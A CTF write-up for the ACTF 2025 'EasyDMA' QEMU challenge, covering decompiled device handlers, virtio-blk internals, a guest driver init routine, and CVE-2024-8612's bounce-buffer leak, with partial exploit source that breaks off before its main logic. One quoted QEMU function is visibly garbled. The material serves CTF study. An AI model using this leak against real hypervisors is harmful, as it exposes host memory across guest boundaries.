QEMU PWN - EasyDMA

EasyDMA

From: ACTF 2025

题目给出一个去符号的 qemu 二进制文件 qemu-system-x86_64,启动参数如下

#!/bin/sh
# Boot the challenge guest; `timeout` ends QEMU after 300 seconds.
# The guest gets a virtio-blk-pci disk backed by null-co:// (ioeventfd off)
# and the custom `readflag` device; the QEMU monitor is sent to /dev/null.
timeout --foreground 300 ./qemu-system-x86_64 \
    -L pc-bios \
    -m 1024 \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -drive file=null-co://,if=none,id=mydisk \
    -device virtio-blk-pci,drive=mydisk,ioeventfd=off \
    -device readflag \
    -append "priority=low console=ttyS0" \
    -monitor /dev/null \
    -nographic

添加两个设备 virtio-blk-pci, readflag

反汇编可以找到 readflag 通过 mmio 的读、写回调函数:

/*
 * MMIO read callback of the readflag device (decompiler output).
 *
 * Size gate: offsets above 0x7F accept only 4-byte accesses, lower offsets
 * accept 4- or 8-byte accesses; any other size returns -1.
 * After the gate: offset 0 returns the constant 0xDEADBEEF, offset 8 returns
 * the 64-bit value stored at opaque + 2984, every other offset returns -1.
 */
__int64 __fastcall readflag_mmio_read(__int64 opaque, unsigned __int64 addr, int size)
{
  __int64 result; // rax

  if ( addr > 0x7F )
  {
    result = -1LL;
    if ( size != 4 )
      return result;
  }
  else if ( size != 4 )
  {
    result = -1LL;
    if ( size != 8 )
      return result;
  }
  result = 0xDEADBEEFLL;
  if ( addr )
  {
    if ( addr == 8 )
      return *(_QWORD *)(opaque + 2984);  // same slot that a write to offset 8 fills
    else
      return -1LL;
  }
  return result;
}
/*
 * MMIO write callback of the readflag device (decompiler output).
 *
 * Offset 8 (4- or 8-byte write): stores val at opaque + 2984.
 * Offset 0 (4-byte write) with val <= 0xFFF: allocates val bytes, reads up to
 * (unsigned)(val - 1) bytes of the file "flag" into that allocation,
 * NUL-terminates what was read and frees the allocation again.
 * Every other offset/size combination is ignored.
 */
void __fastcall readflag_mmio_write(__int64 opaque, unsigned __int64 addr, size_t val, int size)
{
  void *v4; // rbp
  FILE *v5; // rax
  FILE *v6; // r12
  size_t v7; // rax
  int v8; // [rsp+0h] [rbp-20h]

  if ( addr > 0x7F )
  {
    if ( size != 4 )
      return;
  }
  else if ( size != 4 )
  {
    // Only an 8-byte write to offset 8 survives the non-4-byte path.
    if ( size == 8 && addr == 8 )
      goto LABEL_6;
    return;
  }
  if ( addr )
  {
    if ( addr == 8 )
LABEL_6:
      *(_QWORD *)(opaque + 2984) = val;
  }
  else if ( val <= 0xFFF )
  {
    v8 = val;
    v4 = malloc(val);
    if ( v4 )
    {
      v5 = fopen64("flag", "r");
      v6 = v5;
      if ( v5 )
      {
        // The count is v8 - 1 converted to unsigned: for val == 0 it becomes 0xFFFFFFFF.
        v7 = fread(v4, 1uLL, (unsigned int)(v8 - 1), v5);
        if ( v7 )
          *((_BYTE *)v4 + v7) = 0;
        else
          puts("No data read from the file.");
        // Freed without being cleared, so the bytes read from "flag" stay in the released chunk.
        free(v4);
        fclose(v6);
      }
      else
      {
        perror("Error opening file");
        free(v4);
      }
    }
    else
    {
      perror("Memory allocation failed");
    }
  }
}

Virtio Block Device [1]

Data types definition

For the integer data types used in the structure definitions, the following conventions are used:

  • u8, u16, u32, u64

    An unsigned integer of the specified length in bits.

  • le16, le32, le64

    An unsigned integer of the specified length in bits, in little-endian byte order.

/*
 * Shorthand for the integer types used by the structure definitions.
 * The le* names are plain aliases of the same-width unsigned type; no byte
 * swapping is implied by these macros.
 */
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

PCI Capabilities

struct virtio_pci_cap {
    u8 cap_vndr; /* Generic PCI field: PCI_CAP_ID_VNDR */
    u8 cap_next; /* Generic PCI field: next ptr. */
    u8 cap_len; /* Generic PCI field: capability length */
    u8 cfg_type; /* Identifies the structure. */
    u8 bar; /* Where to find it. */
    u8 id; /* Multiple capabilities of the same type */
    u8 padding[2/* Pad to full dword. */
    le32 offset; /* Offset within bar. */
    le32 length; /* Length of the structure, in bytes. */

cfg_type identifies the structure, according to the following table:

/* Values of the cfg_type field of struct virtio_pci_cap. */
/* Common configuration */
#define VIRTIO_PCI_CAP_COMMON_CFG 1
/* Notifications */
#define VIRTIO_PCI_CAP_NOTIFY_CFG 2
/* ISR Status */
#define VIRTIO_PCI_CAP_ISR_CFG 3
/* Device specific configuration */
#define VIRTIO_PCI_CAP_DEVICE_CFG 4
/* PCI configuration access */
#define VIRTIO_PCI_CAP_PCI_CFG 5
/* Shared memory region */
#define VIRTIO_PCI_CAP_SHARED_MEMORY_CFG 8
/* Vendor-specific data */
#define VIRTIO_PCI_CAP_VENDOR_CFG 9

For common configuration, its layout is below:

/*
 * Common configuration structure. The queue_* fields describe whichever
 * virtqueue is currently chosen through queue_select.
 */
struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select; /* read-write */
    le32 device_feature; /* read-only for driver */
    le32 driver_feature_select; /* read-write */
    le32 driver_feature; /* read-write */
    le16 config_msix_vector; /* read-write */
    le16 num_queues; /* read-only for driver */
    u8 device_status; /* read-write */
    u8 config_generation; /* read-only for driver */
    /* About a specific virtqueue. */
    le16 queue_select; /* read-write */
    le16 queue_size; /* read-write */
    le16 queue_msix_vector; /* read-write */
    le16 queue_enable; /* read-write */
    le16 queue_notify_off; /* read-only for driver */
    le64 queue_desc; /* read-write */
    le64 queue_driver; /* read-write */
    le64 queue_device; /* read-write */
    le16 queue_notif_config_data; /* read-only for driver */
    le16 queue_reset; /* read-write */
    /* About the administration virtqueue. */
    le16 admin_queue_index; /* read-only for driver */
    le16 admin_queue_num; /* read-only for driver */
};

For notification, its layout is below:

/* Notification capability: the generic capability followed by the multiplier. */
struct virtio_pci_notify_cap {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier; /* Multiplier for queue_notify_off. */
};

We recognize these types and record the offset of each structure.

/*
 * Print one virtio PCI capability to stdout: its length, a textual name for
 * cfg_type, then bar, id, offset and length in hexadecimal.
 */
void print_cap(struct virtio_pci_cap* cap){
    const char* type_line;

    printf("cap_len: %x\n", cap->cap_len);

    /* Pick the complete output line for this cfg_type. */
    switch(cap->cfg_type){
        case VIRTIO_PCI_CAP_COMMON_CFG:    type_line = "cfg_type: common\n";        break;
        case VIRTIO_PCI_CAP_NOTIFY_CFG:    type_line = "cfg_type: notify\n";        break;
        case VIRTIO_PCI_CAP_ISR_CFG:       type_line = "cfg_type: isr\n";           break;
        case VIRTIO_PCI_CAP_DEVICE_CFG:    type_line = "cfg_type: device\n";        break;
        case VIRTIO_PCI_CAP_PCI_CFG:       type_line = "cfg_type: pci\n";           break;
        case VIRTIO_PCI_CAP_SHARED_MEMORY: type_line = "cfg_type: shared memory\n"; break;
        case VIRTIO_PCI_CAP_VENDOR_CFG:    type_line = "cfg_type: vendor\n";        break;
        default:                           type_line = "cfg_type: unknown\n";       break;
    }
    fputs(type_line, stdout);

    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}

/* Excerpt from init_virtio(): remember where each structure lives inside the mapped BAR. */
switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                /* Other capability types are not needed here. */
                break;
        }

Virtqueue [2]

The mechanism for bulk data transport on virtio devices is pretentiously called a virtqueue. Each device can have zero or more virtqueues.

Each virtqueue can consist of up to 3 parts:

​ • Descriptor Area - used for describing buffers

​ • Driver Area - extra data supplied by driver to the device. Also called avail virtqueue.

​ • Device Area - extra data supplied by device to driver. Also called used virtqueue.

Shared memory with split ring elements

The structures of these areas are defined below:

/* One entry of the Descriptor Area: a buffer plus an optional link to the next entry. */
struct virtq_desc {
    /* Address (guest-physical). */
    le64 addr;
    /* Length. */
    le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
    /* The flags as indicated above. */
    le16 flags;
    /* Next field if flags & NEXT */
    le16 next;
};

/* Driver Area ("avail" ring): ring[] holds le16 entries supplied by the driver. */
struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
    le16 flags;
    le16 idx;
    le16 ring[VIRTIO_QUEUE_SIZE];
    le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

/* One entry of the used ring: which descriptor chain finished and how much was written. */
struct virtq_used_elem {
    /* Index of start of used descriptor chain. */
    le32 id;

    /*
    * The number of bytes written into the device writable portion of
    * the buffer described by the descriptor chain.
    */
    le32 len;
};

/* Device Area ("used" ring): entries supplied by the device to the driver. */
struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
    le16 flags;
    le16 idx;
    struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
    le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

The driver queues requests to the virtqueue, the type of the request is either a read (VIRTIO_BLK_T_IN), a write (VIRTIO_BLK_T_OUT), a discard (VIRTIO_BLK_T_DISCARD), a write zeroes (VIRTIO_BLK_T_WRITE_ZEROES) or a flush (VIRTIO_BLK_T_FLUSH).

/*
 * Block request as seen on the queue: header, data sectors, status byte.
 * NOTE(review): this is descriptive notation; a C compiler rejects a
 * flexible array (data[][512]) that is followed by another member.
 */
struct virtio_blk_req { 
        le32 type; 
        le32 reserved; 
        le64 sector; 
        u8 data[][512]; 
        u8 status; 
}; 
 
/* Range descriptor: a start sector, a sector count and a flags word with an unmap bit. */
struct virtio_blk_discard_write_zeroes { 
       le64 sector; 
       le32 num_sectors; 
       struct { 
               le32 unmap:1; 
               le32 reserved:31; 
       } flags; 
};

/* Request type codes: read, write, flush, discard, write zeroes. */
#define VIRTIO_BLK_T_IN           0 
#define VIRTIO_BLK_T_OUT          1 
#define VIRTIO_BLK_T_FLUSH        4 
#define VIRTIO_BLK_T_DISCARD      11 
#define VIRTIO_BLK_T_WRITE_ZEROES 13

MMIO [3]

Memory-mapped I/O (MMIO) uses the same address space to address both main memory and I/O devices. The memory and registers of the I/O devices are mapped to (associated with) address values, so a memory address may refer to either a portion of physical RAM or to memory and registers of the I/O device.

/*
 * Fixed-width register accessors. Each one performs exactly one volatile
 * load or store of the named width at addr.
 */

/* Load 8 bits from addr. */
uint8_t mmio_read8(void* addr){
    volatile uint8_t* reg = addr;
    return reg[0];
}

/* Load 16 bits from addr. */
uint16_t mmio_read16(void* addr){
    volatile uint16_t* reg = addr;
    return reg[0];
}

/* Load 32 bits from addr. */
uint32_t mmio_read32(void* addr){
    volatile uint32_t* reg = addr;
    return reg[0];
}

/* Load 64 bits from addr. */
uint64_t mmio_read64(void* addr){
    volatile uint64_t* reg = addr;
    return reg[0];
}

/* Store the 8-bit val at addr. */
void mmio_write8(void* addr, uint8_t val){
    volatile uint8_t* reg = addr;
    reg[0] = val;
}

/* Store the 16-bit val at addr. */
void mmio_write16(void* addr, uint16_t val){
    volatile uint16_t* reg = addr;
    reg[0] = val;
}

/* Store the 32-bit val at addr. */
void mmio_write32(void* addr, uint32_t val){
    volatile uint32_t* reg = addr;
    reg[0] = val;
}

/* Store the 64-bit val at addr. */
void mmio_write64(void* addr, uint64_t val){
    volatile uint64_t* reg = addr;
    reg[0] = val;
}

Device configuration layout

/*
 * Device-specific configuration layout of the block device: capacity,
 * segment limits, geometry, block size, topology, discard / write-zeroes /
 * secure-erase limits and zoned-device characteristics.
 */
struct virtio_blk_config {
        le64 capacity;
        le32 size_max;
        le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
    struct virtio_blk_zoned_characteristics {
        le32 zone_sectors;
        le32 max_open_zones;
        le32 max_active_zones;
        le32 max_append_sectors;
        le32 write_granularity;
        u8 model;
        u8 unused2[3];
    } zoned;
};

Initialization

  1. Read capabilities
  2. Reset device
  3. Reset Virtqueue
void init_virtio() {
    int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
    if(fd < 0){
        ERR("Open virtio config");
    }
    struct virtio_pci_cap cap;
    char* config = malloc(0x1000);
    int bytes_read = read(fd, config, 0x1000);
    if(bytes_read < 0){
        ERR("Read virtio config");
    }

    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
    if(fd < 0){
        ERR("Open virtio resource4");
    }
    virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(virtio_mmio == (volatile void*)-1){
        ERR("mmap virtio mem");
    }
    close(fd);

    u8 cap_ptr = *(u8*)(config+0x34);
    while(cap_ptr != 0){
        if(config[cap_ptr] != 0x9){
            cap_ptr = *(u8*)(config+cap_ptr+1);
            continue;
        }
        memcpy(&cap, config+cap_ptr, sizeof(cap));
        print_cap(&cap);
        switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }
        cap_ptr = cap.cap_next;
    }
    close(fd);
    free(config);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    mmio_write32(&common_cfg->device_feature_select, 0);
    printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->device_feature_select, 1);
    printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->driver_feature_select, 0);
    printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
    mmio_write32(&common_cfg->driver_feature_select, 1);
    printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

    struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
    printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
    printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
    printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
    printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
    printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
    printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
    printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

    // reset device
    mmio_write8(&common_cfg->device_status, 0);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write32(&common_cfg->driver_feature_select, 0);
    mmio_write32(&common_cfg->driver_feature, 0); // disable all features
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


    // alloc dma memory
    int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if(dma_fd < 0){
        ERR("Open dma");
    }
    dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
    if(dma_mem == (volatile void*)-1){
        ERR("mmap dma mem");
    }
    *(volatile uint32_t*)dma_mem = 0x12345678;
    printf("%x\n", *(volatile uint32_t*)dma_mem);
    *(volatile uint32_t*)dma_mem = 0;
    printf("dma_mem: %p\n", dma_mem);
    dma_data = dma_mem + 0x1000;
    queue_desc = (struct virtq_desc*)dma_mem;
    queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
    queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

    // init queue
    mmio_write16(&common_cfg->queue_select, 0);
    mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
    mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
    mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
    mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
    mmio_write16(&common_cfg->queue_enable, 1);

    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    puts("virtio init done");
}

Vulnerabilities

CVE-2024-8612

从文件的字符串中可得知 qemu 的版本号为 qemu-8.0.0-rc2,存在一个关于 virtio-blk-pci 的信息泄漏漏洞: CVE-2024-8612

具体利用还可以参考:

HEXACON2024 - DMAKiller: DMA to Escape from QEMU/KVM by Yongkang Jia, Yiming Tao & Xiao Lei,

ACTF2025-EasyDMA Writeup

当 DMA 访问的地址是 MMIO 的,会使用 bounce buffer

/* Map a physical memory region into a host virtual address.
 * May map a subset of the requested range, given by and returned in *plen.
 * May return NULL if resources needed to perform the mapping are exhausted.
 * Use only for reads OR writes - not for read-modify-write operations.
 * Use cpu_register_map_client() to know when retrying the map operation is
 * likely to succeed.
 */
void *address_space_map(AddressSpace *as,
                        hwaddr addr,
                        hwaddr *plen,
                        bool is_write,
                        MemTxAttrs attrs)
{
    hwaddr len = *plen;
    hwaddr l, xlat;
    MemoryRegion *mr;
    FlatView *fv;

    if (len == 0) {
        return NULL;
    }

    l = len;
    RCU_READ_LOCK_GUARD();
    fv = address_space_to_flatview(as);
    mr = flatview_translate(fv, addr, &xlat, &l, is_write, attrs);

    /* The region cannot be accessed directly: hand out the bounce buffer instead. */
    if (!memory_access_is_direct(mr, is_write)) {
        /* Only one mapping may hold the bounce buffer; a second caller gets NULL. */
        if (qatomic_xchg(&bounce.in_use, true)) {
            *plen = 0;
            return NULL;
        }
               /* Avoid unbounded allocations */
        l = MIN(l, TARGET_PAGE_SIZE);
        /*
         * Nothing in this function clears the new buffer; per the
         * surrounding write-up qemu_memalign returns uninitialized memory.
         */
        bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l);
        bounce.addr = addr;
        bounce.len = l;

        memory_region_ref(mr);
        bounce.mr = mr;
        /* Only the !is_write case fills the buffer; for is_write it keeps its previous contents. */
        if (!is_write) {
            flatview_read(fv, addr, MEMTXATTRS_UNSPECIFIED,
                               bounce.buffer, l);
        }

        *plen = l;
        return bounce.buffer;
    }
	//...
}

同时,通过 qemu_memalign 得到的内存并没有初始化。

/* Abridged excerpt: elided parts are marked with "//...". */
static int virtio_blk_handle_request(VirtIOBlockReq *req, MultiReqBuffer *mrb)
{
    uint32_t type;
    struct iovec *in_iov = req->elem.in_sg;
    struct iovec *out_iov = req->elem.out_sg;
    unsigned in_num = req->elem.in_num;
    unsigned out_num = req->elem.out_num;
    VirtIOBlock *s = req->dev;
    VirtIODevice *vdev = VIRTIO_DEVICE(s);
    
    /* A request needs at least one out segment and one in segment. */
    if (req->elem.out_num < 1 || req->elem.in_num < 1) {
        virtio_error(vdev, "virtio-blk missing headers");
        return -1;
    }

    if (unlikely(iov_to_buf(out_iov, out_num, 0, &req->out,
                            sizeof(req->out)) != sizeof(req->out))) {
        virtio_error(vdev, "virtio-blk request outhdr too short");
        return -1;
    }

    iov_discard_front_undoable(&out_iov, &out_num, sizeof(req->out),
                               &req->outhdr_undo);

    if (in_iov[in_num - 1].iov_len < sizeof(struct virtio_blk_inhdr)) {
        virtio_error(vdev, "virtio-blk request inhdr too short");
        iov_discard_undo(&req->outhdr_undo);
        return -1;
    }
    
    //...
    
    /* in_len is taken from the in segments here, before the type dispatch shown below. */
    req->in_len = iov_size(in_iov, in_num);
    
    //...
    
    case VIRTIO_BLK_T_IN:
    {
        bool is_write = type & VIRTIO_BLK_T_OUT;
        req->sector_num = virtio_ldq_p(vdev, &req->out.sector);

        if (is_write) {
            qemu_iovec_init_external(&req->qiov, out_iov, out_num);
            trace_virtio_blk_handle_write(vdev, req, req->sector_num,
                                          req->qiov.size / BDRV_SECTOR_SIZE);
        } else {
            qemu_iovec_init_external(&req->qiov, in_iov, in_num);
            trace_virtio_blk_handle_read(vdev, req, req->sector_num,
                                         req->qiov.size / BDRV_SECTOR_SIZE);
        }

        if (!virtio_blk_sect_range_ok(s, req->sector_num, req->qiov.size)) {
            virtio_blk_req_complete(req, VIRTIO_BLK_S_IOERR);
            block_acct_invalid(blk_get_stats(s->blk),
                               is_write ? BLOCK_ACCT_WRITE : BLOCK_ACCT_READ);
            virtio_blk_free_request(req);
            return 0;
        }
        
	//...

    /* Any type without its own case is completed with VIRTIO_BLK_S_UNSUPP. */
    default:
    virtio_blk_req_complete(req, VIRTIO_BLK_S_UNSUPP);
    virtio_blk_free_request(req);
        
}

在 virtio_blk_handle_request 中,即使请求不合法,长度也会被写入 req->in_len;当 type 不合法时,直接调用 virtio_blk_req_complete。

调用链:virtio_blk_handle_request->virtio_blk_req_complete->virtqueue_push->virtqueue_fill->virtqueue_unmap_sg->dma_memory_unmap->address_space_unmap->address_space_write

/*
 * NOTE(review): as excerpted, result is returned without ever being assigned
 * and __bufread is not defined anywhere in this document; presumably the body
 * was abridged. Compare against the QEMU sources before relying on it.
 */
MemTxResult address_space_write(AddressSpace *as, hwaddr addr,
                                MemTxAttrs attrs,
                                const void *buf, int len)
{
    MemTxResult result;
    __bufread(buf, len);
    return result;
}

由于缺乏保护,数据可以被写到 Common configuration 部分,并且部分空间可被读出。

Exploit

通过堆喷,将 flag 字符串填充在内存中。利用上述漏洞读出内存内容。

#include<stddef.h>
#include<stdlib.h>
#include<unistd.h>
#include<fcntl.h>
#include<sys/mman.h>
#include<string.h>
#include<stdio.h>
#include<assert.h>
#include<stdint.h>
#include<sys/io.h>
#include<linux/stddef.h>

/*
 * Shorthand integer types used by the structures below. The le* names are
 * plain aliases of the same-width unsigned type; no byte swapping is implied.
 */
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

/*
 * One virtio capability as copied out of PCI config space by init_virtio().
 * cfg_type selects the structure kind; offset is added to the BAR mapping
 * to locate that structure.
 */
struct virtio_pci_cap {
    u8 cap_vndr;
    u8 cap_next;   /* config-space offset of the next capability, 0 ends the list */
    u8 cap_len;
    u8 cfg_type;   /* one of enum virtio_pci_cfg_type */
    u8 bar;
    u8 id;
    u8 padding[2];
    le32 offset;
    le32 length;
};

/*
 * Register layout overlaid on the common-configuration MMIO region.
 * Fields are accessed through the mmio_read / mmio_write helpers.
 */
struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select; /* read-write */
    le32 device_feature; /* read-only for driver */
    le32 driver_feature_select; /* read-write */
    le32 driver_feature; /* read-write */
    le16 config_msix_vector; /* read-write */
    le16 num_queues; /* read-only for driver */
    u8 device_status; /* read-write */
    u8 config_generation; /* read-only for driver */
    /* About a specific virtqueue. */
    le16 queue_select; /* read-write */
    le16 queue_size; /* read-write */
    le16 queue_msix_vector; /* read-write */
    le16 queue_enable; /* read-write */
    le16 queue_notify_off; /* read-only for driver */
    le64 queue_desc; /* read-write */
    le64 queue_driver; /* read-write */
    le64 queue_device; /* read-write */
    le16 queue_notify_data; /* read-only for driver */
    le16 queue_reset; /* read-write */
};

/* Notification capability: the generic capability followed by the offset multiplier. */
struct virtio_notify_cfg {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier;
};

/*
 * Register layout overlaid on the device-specific configuration region.
 * init_virtio() only prints capacity, size_max, seg_max, geometry and blk_size.
 */
struct virtio_blk_config{
    le64 capacity;
    le32 size_max;
    le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
};

/* Values of virtio_pci_cap.cfg_type; print_cap() names them, init_virtio() uses the first four. */
enum virtio_pci_cfg_type{
    VIRTIO_PCI_CAP_COMMON_CFG = 0x1,
    VIRTIO_PCI_CAP_NOTIFY_CFG = 0x2,
    VIRTIO_PCI_CAP_ISR_CFG = 0x3,
    VIRTIO_PCI_CAP_DEVICE_CFG = 0x4,
    VIRTIO_PCI_CAP_PCI_CFG = 0x5,
    VIRTIO_PCI_CAP_SHARED_MEMORY = 0x8,
    VIRTIO_PCI_CAP_VENDOR_CFG = 0x9,
};

/* Feature bits */
/* These are bit numbers, not masks (e.g. 5, 6, 9). None of them is used elsewhere in this file. */
#define VIRTIO_BLK_F_SIZE_MAX	1	/* Indicates maximum segment size */
#define VIRTIO_BLK_F_SEG_MAX	2	/* Indicates maximum # of segments */
#define VIRTIO_BLK_F_GEOMETRY	4	/* Legacy geometry available  */
#define VIRTIO_BLK_F_RO		5	/* Disk is read-only */
#define VIRTIO_BLK_F_BLK_SIZE	6	/* Block size of disk is available*/
#define VIRTIO_BLK_F_FLUSH	9	/* Flush command supported */
#define VIRTIO_BLK_F_TOPOLOGY	10	/* Topology information is available */
#define VIRTIO_BLK_F_MQ		12	/* support more than one vq */
#define VIRTIO_BLK_F_DISCARD	13	/* DISCARD is supported */
#define VIRTIO_BLK_F_WRITE_ZEROES	14	/* WRITE ZEROES is supported */
#define VIRTIO_BLK_F_SECURE_ERASE	16 /* Secure Erase is supported */

/* Status byte for guest to report progress, and synchronize features. */
/* We have seen device and processed generic fields (VIRTIO_CONFIG_F_VIRTIO) */
#define VIRTIO_CONFIG_S_ACKNOWLEDGE	1
/* We have found a driver for the device. */
#define VIRTIO_CONFIG_S_DRIVER		2
/* Driver has used its parts of the config, and is happy */
#define VIRTIO_CONFIG_S_DRIVER_OK	4
/* Driver has finished configuring features */
#define VIRTIO_CONFIG_S_FEATURES_OK	8
/* Device entered invalid state, driver must reset it */
#define VIRTIO_CONFIG_S_NEEDS_RESET	0x40
/* We've given up on this device. */
#define VIRTIO_CONFIG_S_FAILED		0x80

/*
 * Entry count of both rings and the value written to queue_size. The fixed
 * offsets in init_virtio() (avail ring at 0x10 * VIRTIO_QUEUE_SIZE) depend on it.
 */
#define VIRTIO_QUEUE_SIZE 0x10

/* One descriptor-table entry: a buffer plus an optional link to the next entry. */
struct virtq_desc {
    /* Address (guest-physical). */
    le64 addr;
    /* Length. */
    le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
    /* The flags as indicated above. */
    le16 flags;
    /* Next field if flags & NEXT */
    le16 next;
};

/* Avail ring written by main(): ring[] entries are indices into the descriptor table. */
struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
    le16 flags;
    le16 idx;
    le16 ring[VIRTIO_QUEUE_SIZE];
    le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

/* One used-ring entry: which descriptor chain finished and how much was written. */
struct virtq_used_elem {
    /* Index of start of used descriptor chain. */
    le32 id;

    /*
    * The number of bytes written into the device writable portion of
    * the buffer described by the descriptor chain.
    */
    le32 len;
};

/* Used ring; init_virtio() places it at offset 0x200 of the DMA mapping. */
struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
    le16 flags;
    le16 idx;
    struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
    le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

/*
 * Header of a block request as placed in DMA memory (16 bytes).
 * data is a C99 flexible array member marking where payload would follow;
 * it adds nothing to sizeof. The status byte is not part of this struct.
 */
